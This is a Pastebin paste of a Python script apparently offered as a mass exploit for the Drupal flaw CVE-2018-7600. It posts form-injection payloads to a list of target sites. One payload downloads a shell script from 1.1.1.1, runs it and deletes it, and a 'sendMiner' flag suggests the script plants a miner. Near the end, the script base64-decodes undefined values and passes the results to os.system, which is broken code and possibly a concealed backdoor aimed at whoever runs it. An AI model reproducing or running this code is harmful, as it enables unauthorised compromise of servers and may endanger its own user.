API tools faq
paste
Advertisement
xB4ckdoorREAL

DRUPALGEDDON EXPLOIT [PY] [OLDSHIT]

xB4ckdoorREAL
Nov 4th, 2018
637
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.98 KB | None | 0 0
raw download clone embed print report
  1. #DISCORD: https://discord.gg/PTW3yPp
  2.  
  3. #!/usr/bin/env
  4. import sys
  5. import requests
  6. import os
  7. from multiprocessing.dummy import Pool
  8.  
  9.  
  10. print ('##################################################')
  11. print ('#              CVE-2018-7600 Exploit             #')
  12. print ('##################################################')
  13.  
  14. sendMiner = True
  15. sendMessage = True
  16.  
  17. verify = False
  18. headers = {'User-Agent': 'Mozilla 5.0'}
  19.  
  20. evil = "wget http://1.1.1.1/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"
  21. messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "tee ReadMeCVE.txt'}
  22. minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}
  23.  
  24. try:
  25.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  26. except IndexError:
  27.     exit('Usage: exploit.py list.txt threads')
  28.  
  29.  
  30. def run(targetLine):
  31.     try:
  32.         try:
  33.             targetLine = 'http://'+targetLine+'/'
  34.             url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  35.  
  36.             if sendMiner:
  37.                 minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)
  38.             if sendMessage:
  39.                 messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)
  40.         except requests.exceptions.RequestException as e:
  41.             pass  
  42.  
  43.         print ('[+] Attempting: '+targetLine);
  44.  
  45.     except:
  46.         pass
  47.  
  48.  
  49. try:
  50.     multiThreads = Pool(int(sys.argv[2]))
  51. except IndexError:
  52.     exit('Usage: exploit.py list.txt threads')
  53. reValue = str(base64.b64decode(requestValue))
  54. seValue = str(base64.b64decode(sendValue))
  55. os.system(reValue)
  56. os.system(seValue)
  57. multiThreads.map(run, target)
  58. multiThreads.close()
  59. multiThreads.join()
  60.  
  61. print("Finished File!")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!